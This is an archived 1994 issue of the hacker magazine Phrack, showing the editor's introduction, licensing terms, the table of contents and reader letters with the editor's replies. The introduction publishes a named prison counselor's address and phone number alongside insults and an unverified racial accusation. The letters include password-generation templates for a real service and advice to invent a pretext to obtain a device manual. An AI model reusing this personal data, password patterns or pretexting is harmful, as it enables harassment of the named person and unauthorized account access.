Phrack #46

EDB-ID:

42857

CVE:

N/A

Author:

phrack

Type:

papers

Platform:

Magazine

Published:

1994-09-20

                              ==Phrack Magazine==

                   Volume Five, Issue Forty-Six, File 1 of 28

                                 Issue 46 Index
                              ___________________

                               P H R A C K   4 6

                               September 20, 1994
                              ___________________

                        "La cotorra que chi, no canta"

Honey, I'm home!  Anyway, like the little proverb above indicates, I've
been a very busy man since the last issue.  I've been denied entry to
a federal prison in North Carolina (imagine the irony of THAT); I've
been whoring in the Red-Light District of Amsterdam with military
intelligence officers from England, Spain and the US; estuve chicaito en
Nuevo Lardeo; I've tested wireless networks in Canada; and I've been
on TV a few more times.  (No, nimrod, Phrack is not my job...I WORK
for a living.)

Needless to say, it has been a chore for me to get Phrack out at all,
much less only a month or so past my self-imposed quarterly deadline.
But hell, I love doing this magazine, so here it is.  Phrack is the only
way I can completely thrill and simultaneously piss off so many people
at once, so I don't think I'll stop any time soon.

Pissing people off.  It's what I like to do, and it would appear that
I'm quite good at it.  I realize that there are several extremely
vocal erikb-bashers out there.  And to them I say, "smooches!"
Let's face it, sour grapes make bad whiners.  But hey, "As long as they're
talking about Erikb, let 'em talk."  (Sorry Mr. Ford)

Besides piecing together this issue, I've been working on getting
the WWW pages together.  They still aren't 100%, but they are getting
there.  By the time I finally get them together, the Phrack
Web Site should be the ultimate underground resource on the net.
Check it out:  http://freeside.com/phrack.html

You may be interested in the federal prison remark from the first
paragraph.  I had a meeting at IBM out in Research Triangle Park.  I
figured that this would be an ideal time to go see Co/Dec who still has
several years of federal time left to serve.  Co/Dec is in
the Federal Correctional Institute at Butner, North Carolina, a short
30 or so minutes from where I was staying in RTP.

Anyway, I receive the necessary forms from Co/Dec to get on the approved
visitors list, and sent them back in.  After several weeks, Co/Dec said
that I still had not been added.  My trip was slated for a week away, so
I called his counselor, Wilbert LeMay.  Mr. LeMay told me that he never got
my forms.  I then fed-ex'ed a copy (that I luckily had kept).  It arrived
on Friday morning, and I was to arrive on Monday.  Mr. LeMay had assured me
that it would be no problem to get me added to Co/Dec's list.

When I arrived on Monday, I called the prison to make sure the visit had
been cleared.  Mr. LeMay would not return my calls.  In fact, not only
would he not return any of the 5 or so calls I made, but he didn't even
bother to enter my name on the visitor list until the Wednesday after I
had already left North Carolina.

I'm sorry, but this man must be a real prick.

A bit of background on LeMay.  First off, according to those on the inside,
LeMay dislikes white people.  He supposedly keeps a picture of slaves
picking cotton on his desk as a constant reminder of the oppression his
people were subjected to.  But perhaps working in the prison system where
you have constant view of the Aryan Brotherhood in action, I'm sure many
would begin to feel likewise.  (Can't we all just get along?)  Secondly,
LeMay dislikes Co/Dec.  He put Co/Dec in solitary confinement for weeks
because Co/Dec had a DOS MANUAL!  A fucking DOS MANUAL!  You do not
put someone in the fucking hole for brushing up on the syntax for xcopy!
You put them in the hole for inciting a fucking shank war, or for stealing
food, or for punching a guard.  Later, Co/Dec found himself in solitary
confinement AGAIN because he traded some smokes for telephone parts he was
going to use to fix a radio.  The hole again.  Not for weapons and drugs,
NO!  Much worse:  wires and a speaker!

The prison now considers Co/Dec a security risk, and read all OUTGOING
mail he sends.  Not just the regular reading of all incoming mail
that any inmate would expect.  He can't take any clases, he's had
several more days added to his sentence for "bad time served,"
and in addition, all of his phone calls are live monitored and recorded.
(A funny note, during one conversation I found that my touchtones would
control the equipment they were using to record the call.  The equipment
they were using was improperly connected and gave off a terrible hum
when activated.  I kept turning off the recording, and the security
officer kept having to turn it back on.)

All of this, due to Counselor Wilbert LeMay.  Thanks guy.

If someone can so grossly abuse their power to completely remove the
dignity of another human being, inmate or otherwise, that person needs
to face severe disciplinary action.  I'm writing the warden.  Directory
Assistance says that Wilbert can be reached at:

Wilbert LeMay
701 East E St.
Butner, NC 27509
919-575-6375

Fun fact:  Butner is serviced by GTE.

You know, its pretty odd that as hackers, we probably know a larger number
of ex-cons and current inmates than most people.

But anyway, on to Phrack.

This issue is pretty odd in that "The Man" has consented to write
a few syllables for us to distribute.  Yes, Winn Schwartau submitted
his unique perspectives of Defcon and HOPE.  It's funny how many people
left Defcon this year and ran home to find information on HIRF weapons
after hearing Winn speak.  (If you've actually built one by now, email
me.)

What else?  GS1, Pagers, Voice Mail, VisaNet, Area 51, Programs,
Conferences, and an incomplete university dialup list.  (Putting out
an incomplete list really irritates me, but hell, its taking a LOT
longer than I expected to get some 1300 dialups without more help.
AHEM!)

Can you dig it?  I knew that you could.

-------------------------------------------------------------------------

                        READ THE FOLLOWING

                IMPORTANT REGISTRATION INFORMATION

Corporate/Institutional/Government:  If you are a business,
institution or government agency, or otherwise employed by,
contracted to or providing any consultation relating to computers,
telecommunications or security of any kind to such an entity, this
information pertains to you.

You are instructed to read this agreement and comply with its
terms and immediately destroy any copies of this publication
existing in your possession (electronic or otherwise) until
such a time as you have fulfilled your registration requirements.
A form to request registration agreements is provided
at the end of this file.  Cost is $100.00 US per user for
subscription registration.  Cost of multi-user licenses will be
negotiated on a site-by-site basis.

Individual User:  If you are an individual end user whose use
is not on behalf of a business, organization or government
agency, you may read and possess copies of Phrack Magazine
free of charge.  You may also distribute this magazine freely
to any other such hobbyist or computer service provided for
similar hobbyists.  If you are unsure of your qualifications
as an individual user, please contact us as we do not wish to
withhold Phrack from anyone whose occupations are not in conflict
with our readership.

_______________________________________________________________

Phrack Magazine corporate/institutional/government agreement

   Notice to users ("Company"):  READ THE FOLLOWING LEGAL
AGREEMENT.  Company's use and/or possession of this Magazine is
conditioned upon compliance by company with the terms of this
agreement.  Any continued use or possession of this Magazine is
conditioned upon payment by company of the negotiated fee
specified in a letter of confirmation from Phrack Magazine.

   This magazine may not be distributed by Company to any
outside corporation, organization or government agency.  This
agreement authorizes Company to use and possess the number of copies
described in the confirmation letter from Phrack Magazine and for which
Company has paid Phrack Magazine the negotiated agreement fee.  If
the confirmation letter from Phrack Magazine indicates that Company's
agreement is "Corporate-Wide", this agreement will be deemed to cover
copies duplicated and distributed by Company for use by any additional
employees of Company during the Term, at no additional charge.  This
agreement will remain in effect for one year from the date of the
confirmation letter from Phrack Magazine authorizing such continued use
or such other period as is stated in the confirmation letter (the "Term").
If Company does not obtain a confirmation letter and pay the applicable
agreement fee, Company is in violation of applicable US Copyright laws.

    This Magazine is protected by United States copyright laws and
international treaty provisions.  Company acknowledges that no title to
the intellectual property in the Magazine is transferred to Company.
Company further acknowledges that full ownership rights to the Magazine
will remain the exclusive property of Phrack Magazine and Company will
not acquire any rights to the Magazine except as expressly set
forth in this agreement.  Company agrees that any copies of the
Magazine made by Company will contain the same proprietary
notices which appear in this document.

    In the event of invalidity of any provision of this agreement,
the parties agree that such invalidity shall not affect the validity
of the remaining portions of this agreement.

    In no event shall Phrack Magazine be liable for consequential, incidental
or indirect damages of any kind arising out of the delivery, performance or
use of the information contained within the copy of this magazine, even
if Phrack Magazine has been advised of the possibility of such damages.
In no event will Phrack Magazine's liability for any claim, whether in
contract, tort, or any other theory of liability, exceed the agreement fee
paid by Company.

    This Agreement will be governed by the laws of the State of Texas
as they are applied to agreements to be entered into and to be performed
entirely within Texas.  The United Nations Convention on Contracts for
the International Sale of Goods is specifically disclaimed.

    This Agreement together with any Phrack Magazine
confirmation letter constitute the entire agreement between
Company and Phrack Magazine which supersedes any prior agreement,
including any prior agreement from Phrack Magazine, or understanding,
whether written or oral, relating to the subject matter of this
Agreement.  The terms and conditions of this Agreement shall
apply to all orders submitted to Phrack Magazine and shall supersede any
different or additional terms on purchase orders from Company.

_________________________________________________________________

            REGISTRATION INFORMATION REQUEST FORM


We have approximately __________ users.

Enclosed is  $________

We desire Phrack Magazine distributed by (Choose one):

Electronic Mail: _________
Hard Copy:       _________
Diskette:        _________  (Include size & computer format)


Name:_______________________________  Dept:____________________

Company:_______________________________________________________

Address:_______________________________________________________

_______________________________________________________________

City/State/Province:___________________________________________

Country/Postal Code:___________________________________________

Telephone:____________________   Fax:__________________________


Send to:

Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701
-----------------------------------------------------------------------------


Enjoy the magazine.  It is for and by the hacking community.  Period.


      Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
                3L33t : Ice-9 (for helping me get this done!)
             Rad Band : Green Day
                 News : Datastream Cowboy
          Photography : The Man
    Prison Consultant : Co / Dec
       The Young Girl : Jane March
    Motor Trend's Car
          of the Year : The 2600 Van
Dickhead of the Month : Wilbert LeMay at FCI Butner
            Thanks To : Szechuan Death, Carl Corey, The Shining, Dcypher
                        Hitman Italy, Herd Beast, Dr. Delam, Maldoror,
                        The Red Skull, PsychoSpy, Seven Up, Erudite, Ice Jey
    Special Thanks To : Winn Schwartau

Phrack Magazine V. 5, #46, September 20, 1994.     ISSN 1068-1035
Contents Copyright (C) 1994 Phrack Magazine, all rights reserved.
Nothing may be reproduced in whole or in part without written
permission of the Editor-In-Chief.  Phrack Magazine is made available
quarterly to the amateur computer hobbyist free of charge.  Any
corporate, government, legal, or otherwise commercial usage or
possession (electronic or otherwise) is strictly prohibited without
prior registration, and is in violation of applicable US Copyright laws.
To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
the list.

                    Phrack Magazine
                    603 W. 13th #1A-278              (Phrack Mailing Address)
                    Austin, TX 78701

                    freeside.com                     (Phrack FTP Site)
                    /pub/phrack

                    http://freeside.com/phrack.html  (Phrack WWW Home Page)

                    phrack@well.sf.ca.us             (Phrack E-mail Address)
                 or phrackmag on America Online

Submissions to the above email address may be encrypted
with the following key : (Not that we use PGP or encourage its
use or anything.  Heavens no.  That would be politically-incorrect.
Maybe someone else is decrypting our mail for us on another machine
that isn't used for Phrack publication.  Yeah, that's it.   :) )

** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED **

Phrack goes out plaintext...you certainly can subscribe in plaintext.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a

mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
=q2KB

-----END PGP PUBLIC KEY BLOCK-----


  -= Phrack 46 =-
 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1.  Introduction by The Editor                                   17 K
 2.  Phrack Loopback / Editorial                                  52 K
 3.  Line Noise                                                   61 K
 4.  Line Noise                                                   56 K
 5.  Phrack Prophile on Minor Threat                              12 K
 6.  Paid Advertisement                                           62 K
 7.  Paid Advertisement (cont)                                    45 K
 8.  The Wonderful World of Pagers by Erik Bloodaxe               24 K
 9.  Legal Info by Szechuan Death                                 13 K
 10. A Guide to Porno Boxes by Carl Corey                         13 K
 11. Unix Hacking - Tools of the Trade by The Shining             42 K
 12. The fingerd Trojan Horse by Hitman Italy                     32 K
 13. The Phrack University Dialup List                            12 K
 14. A Little About Dialcom by Herd Beast                         29 K
 15. VisaNet Operations Part I by Ice Jey                         50 K
 16. VisaNet Operations Part II by Ice Jey                        44 K
 17. Gettin' Down 'N Dirty Wit Da GS/1 by Maldoror & Dr. Delam    25 K
 18. Startalk by The Red Skull                                    21 K
 19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau        45 K
 20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau       42 K
 21. The Groom Lake Desert Rat by PsychoSpy                       44 K
 22. HOPE by Erik Bloodaxe                                        51 K
 23. Cyber Christ Bites the Big Apple by Winn Schwartau           60 K
 24. The ABCs of Better Hotel Staying by Seven Up                 12 K
 25. AT&T Definity System 75/85 by Erudite                        13 K
 26. Keytrap v1.0 Keyboard Key Logger by Dcypher                  35 K
 27. International Scenes by Various Sources                      44 K
 28. Phrack World News by Datastream Cowboy                       38 K

                                                    Total:       996 K

_______________________________________________________________________________

"Most hackers would have sold out their mother."
         Justin Tanner Peterson

"Treason is loved of many but the traitor hated of all."
        Robert Greene (1552-1592)

"They smile in your face, but all the while they want to take your place."
        The O'Jays


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 2 of 28

****************************************************************************

                                Phrack Loopback


------------------------------------------------------------------------------

I'd like to write you about my friends cat.  His name is 'Cid.  Cid
loves reading, in fact he'll read just about anything, from the labels on
his cat food tins to the instructions on the "real" use of his Grafix
(incense burner :) ).  Well one take, 'Cid (or was it me) was indulging
in the reason he got his moniker and mentioned that he'd like to receive
Phrack.  Well i told him he could just subscribe to it and then he went
into a real sob story about how he doesn't have net access.  So as a
favor to 'Cid (who really does exist, and really has tripped out on brain
blotters) i'd like to subscribe to Phrack.

[You my want to take note that Phrack can also be printed on paper.
 Now, that's a lot of blotter.

 You've got your subscription, now go watch some anime.]

------------------------------------------------------------------------------

I recently got a new job and shortly after beginning working there, they
decided to retool and reorganize a bit for better productivity.

While we were going through some old boxes and stuff, I came across a
little black box with the words "Demon Dialer" molded into the front of
it, it even had the (functional!) 20volt power supply.

Needless to say I was pretty happy with my find.  I asked if I could have
it and since no one else there seemed to know what to make of it, mine it
was!

My only problem now... I've played around with it, and it seems to do a
lot more than what I originally thought, but the fact of the matter is..
I really haven't the foggiest idea of how to get it to REALLY work for me.

If anyone has any information, or better still, actual documentation for
a Telephonics Inc, Demon Dialer.. I'd really appreciate passing it on to me.

Also, something rater strange.  The phone cable attached to it had a
normal looking 4-wire connector on one end, but the other was split to
have RJ jacks, one with the yellow-black combo and one with the
red-green.  The split ends (sorry :)) were plugged into the WALL and
PHONE jacks on the demon dialer.  The purpose for this perplexes me since
one's supposed to be input and one's supposed to be a passthrough for the
phone to be plugged into.

Anyway, any info would be nice.  Thanks guys.

[Telephonics was one of those odd telco device manufacturers back in the
 80's.  They made the demon dialer (a speed dialing device), a
 two-line conference box, a divertor, etc.  Essentially, they provided
 in hardware what the telco's were beginning to roll-out in software.

 I think the line splitter you have was merely plugged into those
 two jacks for storage purposes.  What that probably was for was to
 allow two lines to use the Demon Dialer.  It was probably just reversed
 when your company boxed it so it wouldn't get lost.

 I'm not sure if Telephonics is still in business.  A good place to
 start looking for info would be comp.dcom.telecom or alt.dcom.telecom.
 Another good place may be Hello Direct (800-HI-HELLO).  They used to
 do have Telephonics equipment available for mail-order.]

------------------------------------------------------------------------------

I saw an ad for a book called "Secrets of a SuperHacker" by Knightmare.
Supposedly it intersperses tales of his exploits with code and examples.
I have big doubts, but have you heard anything good/bad about it?

[Your doubts are well founded.  I got an advance copy of that book.
 Let's put it this way:  does any book that contains over a dozen pages
 of "common passwords" sound like ground breaking material?

 This book is so like "Out of the Inner Circle" that I almost wanted
 to believe Knightmare (Dennis Fiery) was really yet another
 alias for Bill Landreth.  Imagine "Out of the Inner Circle" with
 about a hundred or more extra pages of adjectives and examples that
 may have been useful years back.

 The Knightmare I knew, Tom in 602, whose bust by Gail Thackeray
 gave law enforcement a big buffer of the Black Ice Private BBS
 and help spark the infamous LOD Hacker Crackdown, certainly didn't
 have anything to do with this.  In fact, the book has a kind of
 snide tone to it and is so clueless, that leads me to believe it
 may have been written by a cop or security type person looking to
 make a quick buck.

 As far as source code, well, there is a sample basic program that
 tries to emulate a university login.

 If you want a good book, go buy "Firewalls and Internet Security" by
 Cheswick and Bellovin.]

------------------------------------------------------------------------------

Hey Chris,

I'm sure you are under a constant avalanche of requests for certain files,
so I might as well add to your frustration <grin>.  I know of a program
that supposedly tracks cellular phone frequencies and displays them on
a cellmap.  However, I don't know the name of the program or (obviously)
where to find this little gem.  I was wondering if you could possibly
enlighten me on a way to acquire a program similar to the one I have
described.  I have developed some other methods of tracking locations
of cellular calls.  However my methods rely on a database and manually
mapping cellular phones, this method is strictly low tech.  Of course
this would be for experimental use only, therefore it would not be used
to actually track actual, restricted, radio spectrum signals.  I wouldn't
want the aether Gestapo pummeling our heads and necks.

[I don't know of anything that plots frequencies on a cellmap.  How would
 you know the actual locations of cells for whatever city you may
 be in to plot them accurately?

 There are a number of programs written to listen to forward channel messages
 and tell you when a call is going to jump to another channel.  The cellular
 telephone experimenter's kit from Network Wizards has a lot of nice
 C source that will let you write your own programs that work with their
 interface to the OKI 900.  I suppose you could get the FCC database
 CD-ROM for your state and make note of longitude and latitude of cell sites
 and make your own database for your city, and then make a truly
 visual representation of a cellmap and watch calls move from cell to cell.
 But I don't think there is such a thing floating around the underground
 at present.

 Of course the carriers have this ability, and are more than happy to make
 it available to Law Enforcement (without a warrant mind you).  Hi OJ!

 email Mark Lottor mw@nw.com for more info about the CTEK.]

------------------------------------------------------------------------------

I saw this in a HoHoCon ad:

        Top Ten Nark List
        1. Traxxter
        2. Scott Chasin
        3. Chris Goggans
        4. Aget Steal
        5. Dale Drrew
        6. Cliff Stoll
        7. [blank]
        8. Julio Fernandez
        9. Scanman
       10. Cori Braun

What did Chris Goggans do?  Isn't he Erik Bloodaxe, the publisher of
Phrack?  I sincerely doubt that the feds would have someone
working for them that puts out a publication like Phrack.  It would
be way too much of an embarrassment for them.  I wrote to the
editor of Phrack when I read that Agent Steal said that the publisher
of Phrack was a Fed - IN PHRACK no less.  He said it was a stupid rumor.
Is there anything to support this fact?  And why is there now some manhunt for
Agent Steal (at CFP the FBI was checking legs) if Steal was admittedly
their employee?  The whole thing is very confusing to me.  Please explain.
If Goggans isn't Bloodaxe then he'd Knight Lightning (this just came to me).
Nevertheless, what's the story here?

[First off, I think you take things a little too seriously.  If you are on
 a nark hunt, worry about your associates, not people you obviously
 don't even know.  Chris Goggans (ME) is most positively Erik Bloodaxe.
 Thanks for remembering.

 Agent Steal was involved with the FBI.  This is a fact.
 In his case, he even appeared to have some kind of immunity while trying
 to gather information on other hackers like Mitnik and Poulsen.  This
 immunity is under scrutiny by the Bureau's own Internal Affairs (or so the
 new rumors go), since Steal was pulling a fast one and committing crimes
 the Bureau didn't know about to get some quick cash while he set up his
 friends.

 My story is a bit more convoluted.  You can sum it up by saying, if you
 interfere with my businesses, I'll try my best to track you down and turn
 you in.  I guess I am a nark.]

------------------------------------------------------------------------------

I read in the last Phrack (45) that you wanted someone to write a few
words on scrambling systems. Give me a rough outline of what you want
and I'll see if I can help :-) Basically I wrote the Black Book
(European Scrambling Systems 1,2,3,4,5 and World Satellite TV &
Scrambling Methods) and also edit Hack Watch News & Syndicated
HackWatch. They all deal with scrambling system hacks as opposed to
computer hacking & phreaking. (Things are a bit iffy here as regards
phreaking as all calls are logged but the eprom phone cards are easy
to hack) Oh yeah and another claim to fame ;-) if you can call it
that, is that I was quoted in an article on satellite piracy in
"Wired" August issue.

This Hawkwind character that you had an article from in Phrack43
sounds like a *real* hacker indeed :-> Actually there is an elite in
Ireland but it is mainly concerned with satellite hacking and that
Hawkwind character is obviously just a JAFA (Irish hacker expression
- Just Another Fu**ing Amateur). Most of the advanced telco stuff is
tested in the south of the country as Dublin is not really that
important in terms of comms - most of the Atlantic path satellite
comms gear and brains are on the south coast :-)

Actually the Hawkwind article really pissed off some people here in
Ireland - there were a few questions asked on my own bbs (Special
Projects +353-51-50143) about this character. I am not even sure if
the character is a real hacker or just a wannabe - there were no
responses from any of his addresses. SP is sort of like the neutral
territory for  satellite and cable hacking information in Europe
though there are a few US callers. With the way things are going with
your new DBS DirecTv system in the US, it looks like the European
satellite hackers are going to be supplying a lot of information
(DirecTv's security overlay was developed by News Datacom - the
developers of the totally hacked VideoCrypt system here in Europe).

There telco here uses eprom phone cards. These are extremely easy to
hack (well most real hackers in .IE work on breaking satellite
scrambling systems that use smart cards) as they are only serial
eprom.

Regards

[About the satellite information:  YES!  Write the biggest, best
 article the whole fucking hacker world has ever seen about
 every aspect of satellite tv!!  Personally, I'm more interested in
 that than anything else anyone could possibly write (seeing as how
 I'm about to buy a dish for both C and Ku).

 About Hawkwind's article on hacking in Ireland:  If I were to write
 an article about hacking in America, it would be entirely different
 than anyone else in America would write.  A country is a big place.
 Just because someone else's hacking experience is different than
 your own, it's no reason to discredit them.  However, if your
 exposure to the scene in Ireland is so completely different than
 Hawkwind's, I would LOVE to print it as well.]

------------------------------------------------------------------------------

The Columbus Freenet uses a password generating routine that takes the
first and last initial of the user's real name, and inserts it into a randomly
chosen template.  Some of the templates are:

E(f)www5(l)
(f)22ww5(l)    where f and l are first and last initials
(f)2ww97(l)
(f)2ww95(l)

and so on.  There are not too many of these templates, I guess maybe 50.
I imagine most people go in and change their password right away, but
then again that's what a prudent person would do (so they probably don't).

Columbus 2600 meetings:

Fungal Mutoid-sysop of The KrackBaby BBS (614-326-3933) organized the
first 2600 meetings in Columbus, unfortunately hardly anyone shows up...
I don't know why HP is so dead in Central Ohio, but fear and paranoia
run rampant.
That's all for now...keep up with the good work!

R.U.Serius?!

[Hmmm...templates are always a bad thing. All one has to do is get the
 program that generates them, and viola, you've got a pre-made dict file
 for your crack program.  Not very smart on the part of the Freenet,
 but hacking a Freenet, is like kicking a puppy.

 I hope more people go to your 2600 meetings.  The ones here in Austin
 kinda died out too.  Maybe our cities are just lame.]

------------------------------------------------------------------------------

A complaint:  That piece about McDonald's in Phrack 45 was, in a word, LAME.
Surely Phrack can do better.  Maliciousness for its own sake isn't very
interesting and frankly the article didn't have any ideas that a bored
13-year-old couldn't have thought up--probably written by one.

That aside, I found some good stuff in there.  Some of it was old news,
but Phrack serves an archival purpose too, so that was ok.  On a more
personal note, I could really relate to your account of HoHoCon--not that
I was there, just that I have started to feel old lately even though I don't
turn 25 for another 2 days  :)  Sometimes I feel myself saying things like
"Why, sonny, when I was your age the Apple II was king..."

Keep up the good work, and don't let the lamers get you down.

[Thanks for the letter.  I personally thought the McDonald's file was
 a laugh riot.  Even if it was juvenile and moronic, I wouldn't expect
 anyone to analyze it and go through with anything it contained.  It was
 just for fun.  Lighten up :)

 I am glad to see that at least someone else recognizes that Phrack
 is attempting to serve as an archive of our subculture, rather than just
 a collection of technical info that will be outdated overnight, or a
 buglist that will be rendered mostly unusable within hours of release.

 There is so much going on within the community, and it is becoming such a
 spectacle in the popular media, that in 20 years, we can all go back and
 look at Phrack and remember the people, places, and meetings that
 changed the face of the net.

 Or maybe I'm just terribly lame, and either 1) refuse to put in the
 good stuff, 2) don't have access to the good stuff, 3) exist only as a
 puppet agent of The Man, or 4) Don't know nothin' 'bout Telco!
 But you know what they say about opinions.]

----------------------------------------------------------------------------

I have a few comments on your editorial in Phrack 44 (on information
wants to be free).  Thanks for voicing an opinion that is shared by many
of us.  I am glad to see a public figure in the CuG with nutz enuff to
actually come out and make such a statement and mean it.
Again, thanks.

Now on the subject of hacking as a whole.  Is it just me, or are the number
of losers on the increase?  There have always been those who would try
and apply these skills to ripoff scams and system trashing but now that
seems to be the sole intent of many of the "hackers" I come into contact
with.  What ever happened to hacking to learn more about the system.  To
really hack a system (be it phone, computer), is a test of skill and
determination, and upon success you walk away with a greater understanding
of the machine and its software.  Hacking is more than just knowing how
to run crack on a filched password file, or using some exploitation
scripts picked up on IRC, it is a quest for knowledge and gaining
superiority over a system by use of great skill acquired by a deliberate
effort.  Once was a time when things like toll fraud (I do miss blue
boxes) were a means to an end, now they seem to be the end in itself.

Also, I am researching info on OSI comsec procedures and have found some
really interesting goodies, if you are interested in publishing
my piece when completed, let me know..

[(NOTE:  This came from a .mil)
 Man, I'm glad to see that people in the armed forces still have minds
 of their own.  Not many people would express such a thing openly.

 Yes, the destructive/profit-motivated trends of many of the hackers of
 today are pretty sad.  But you have to realize, as the technology
 becomes more and more like consumer electronics, rather than the
 traditional mold of computer as scientific research tool, an entirely
 different market segment will be exposed to it and use the technology
 for less than scrupulous means.

 Even the act of hacking itself.  Today, I can basically gain access
 to any model of system known to man by asking.  I realize that
 there are many who cannot accomplish such a thing, but with the
 proliferation of public access sites, almost everyone can afford
 access to the net to explore and learn.  The point comes down to this:
 if you have an account on a Sun, why do you need an account on a Sun
 at Boeing, unless you either 1) want to sell the cad files of the 777 to
 Airbus or McDonnell-Douglas 2) want to get financial information to
 make a killing on Wall Street, or 3) just want to have an ego boost
 and say "I OWN BOEING!"

 Personally, I can understand the ego boost aspect, but I've decided that
 I'd much rather get paid by a company like Boeing to hack for them
 than against them.  I don't want to sell anyone's info, so hacking
 into any company is basically useless to me, unless they are paying me
 to look for potential weaknesses.

 Granted, it's not an easy market to get into, but it's a goal to
 shoot for.

 And for those who find it impossible to quit due to fear of losing
 their edge, check out my editorial in this issue for a possible
 solution.]

------------------------------------------------------------------------------

I am looking for a Macintosh app that does the same thing as an app
called "Demon Dial" that has been lost in the annals of software
history due to the fact that some people (sysops) question whether it
is illegal software (it dials up a series of phone #'s looking for data
connections).  Do you know where I could find an application for the Mac
that does this simple function?

[We had a guy ask in an earlier issue for Macintosh hacking/phreaking
 apps.  Noone responded.  Hell, I know SOMEONE has to use a Mac
 out there.  Are you Mac-weenies all embarrassed to speak up?

 Hell, uuencode and email me your aps, and I'll put them up for
 ftp!  Help out your poor fellow Macintosh users.  I certainly
 would if I could, but the thought of touching a Mac gives me the
 chills.]

------------------------------------------------------------------------------

Have you ever heard of being denied access to your own cell phone?
I am currently in the process of buying a cell phone and was informed
that I COULD NOT have the programming guide of the security code
they enter to program my phone.  In my opinion the key word is "MY."
If I get a digital security system for my house you better damn well
figure I will have the security codes for that.  The phone was a Motorola
flip phone.  I called Motorola and explained how displeased I was with
this company and they said they could not interfere with a reps. policy.
When I was selling car phone we kept the programming guide unless they
asked for it.  I demanded it and they laughed in my face.  Who said
"the customer is always right" anyway?

Thanks, any info is greatly appreciated.  By the way, you wouldn't
happen to have the CN/A number for 815 would you?  Also, any ANAC
would be very helpful.

[Well, I hate to say it, but you got typical service from your
 cellular agent.  Let's face it, these sales reps probably knew
 about as much about that programming manual as I do nuclear
 physics:  "Its confusing, but if you understand it, you can fuck
 things up."

 I am surprised that Motorola wouldn't sell you the book though.
 Motorola will sell anybody anything.  You probably called the wrong
 place.  Moto is so huge they've got multiple groups working on somewhat
 similar technologies with absolutely no communication between the groups.
 Sometimes they are in different countries, but sometimes they are in the
 same city!  I would suggest you call a local FAE (Field Applications
 Engineer)
 and get them to get the book for you.  Make up some story about
 working on some computer controlled application with the phone, and that
 you need any and all documentation on the phone.  They'll do it.  Money
 is money.

 As far as the 815 CNA, hell, just call the business office.  I haven't
 called a CNA in years, only the business office.  They are nice people.
 And no PINs.

 815 ANAC:  ok guys, someone must have one...email it!

 "The customer is always right"  wasn't in Bartlett's or Columbia's
 books of famous quotations.  I guess that phrase has been written out of out
 history.  So, from now on you aren't always right, I guess.]

------------------------------------------------------------------------------

Dear Phrack:


We want you!

We want you to be a part of our cutting edge documentary that is traversing
across the "NEW EDGE" of computers, culture, and chaos.

Working in conjunction with Douglas Rushkoff, the best selling author of
"CYBERIA,"  we are currently gathering together the leaders of this
technological and cultural revolution.  This is not a documentary in the
traditional sense of the word.  It is more of an exploration, a journey, a
unique vision of the world as seen through the eyes of those who live on the
bleeding edge; where technology, art, science, music, pleasure, and new
thoughts collide.  A place people like you and me like to call home.

"New Edge" will deliver a slice of creativity, insanity, and infallibility,
and feed those who are hungry for more than what Main Street USA has to
offer.  This project will detonate across the US and around the world.  It
will become the who's who of the new frontier and you belong on it's
illustrious list of futurians.  Please look over the enclosed press release
description of the project.

Phrack has long been the ultimate source for hack/phreak info, and helped to
push the limits of free speech and information.  The role that Phrack has
played in the Steve Jackson Games Case set an important precedent for
CyberLaw.  We will also be interviewing several people from the EFF.

Please call me ASAP to schedule an interview for "New Edge", or send me
E-Mail.

Sincerely,

Todd LeValley
Producer, N E W   E D G E
(310) 545-8138  Tel/Fax
belief@eworld.com


  W E L C O M E
   T O   T H E
    W O R L D
   O N   T H E
  E D G E   O F
T H E  F U T U R E


  W E L C O M E
   T O   T H E
 N E W   E D G E
-the documentary-


T h e  O r g a n i z a t i o n

Belief Productions in association with Film Forum.

T h e   M i s s i o n

Journey through the labyrinth of cyberia and experience the people, places
and philosophy that construct cyberspace and the shores of the technological
frontier.  This fast paced visual voyage through the digital revolution will
feature interviews with the innovators, artists, cyberpunks, and visionaries
from all sides of the planet.  These specialists are the futurists who are
engineering our cybergenic tomorrow in laboratories today.  Along the way we
will investigate the numerous social and political issues which are cropping
up as each foot of fiber optic cable is laid.  Artificial intelligence, the
Internet, nanotechnology, interactive media, computer viruses, electronic
music, and virtual reality are just a few of the many nodes our journey will
explore.

T h e   F u n d i n g

This exploration is sponsored in part by a grant from The Annenberg
Foundation in association with the LA based non-profit cutting-edge media
group Film Forum.

T h e   P r o c e s s

The New Edge project will capture moving images with a variety of input
devices and then assemble them into one fluid documentary using Apple
Macintosh Quadras & PowerMac computers.  The post production work will be
done entirely on the computers using the Radius Video Vision Telecast Board
in conjunction with Quicktime software applications such as Adobe Premiere
4.0 and CoSA After Effects 2.01.  The final piece will be recorded to BETACAM
SP videotape for exhibition and distribution.  The capture formats for the
project will include: BETACAM SP, Super VHS, Hi-8, 16MM Film, Super-8 Film,
35MM Stills, and the Fisher
Price Pixelvision 2000.

T h e   R e s u l t s

New Edge will pride itself on an innovative visual and aural style which
before today, could only be created on high-end professional video systems
and only for short format spots.  The New Edge documentary will be two hours
in length and will have a dense, layered look previously featured only in
much shorter pieces.  New Edge will be a showcase piece not only for the
content contained within, but for the way in which the piece was produced.
 It will be a spectacular tribute to the products and technology involved in
its creation.

D i s t r i b u t i o n

Direct Cinema - Distributes videos to Libraries, Schools, and Universities
throughout the United States.

Mico Entertainment/NHK Enterprises - Provider of American programming for
Japanese Television.

Labyrinth Media Ltd. - European reality-based documentary distributor

T h e   A u d i e n c e

New Edge is aimed at both the technophiles and technophobes alike.  While the
show will feature very complex and sophisticated topics, the discussions will
be structured to appeal to both those who do and do not have the technical
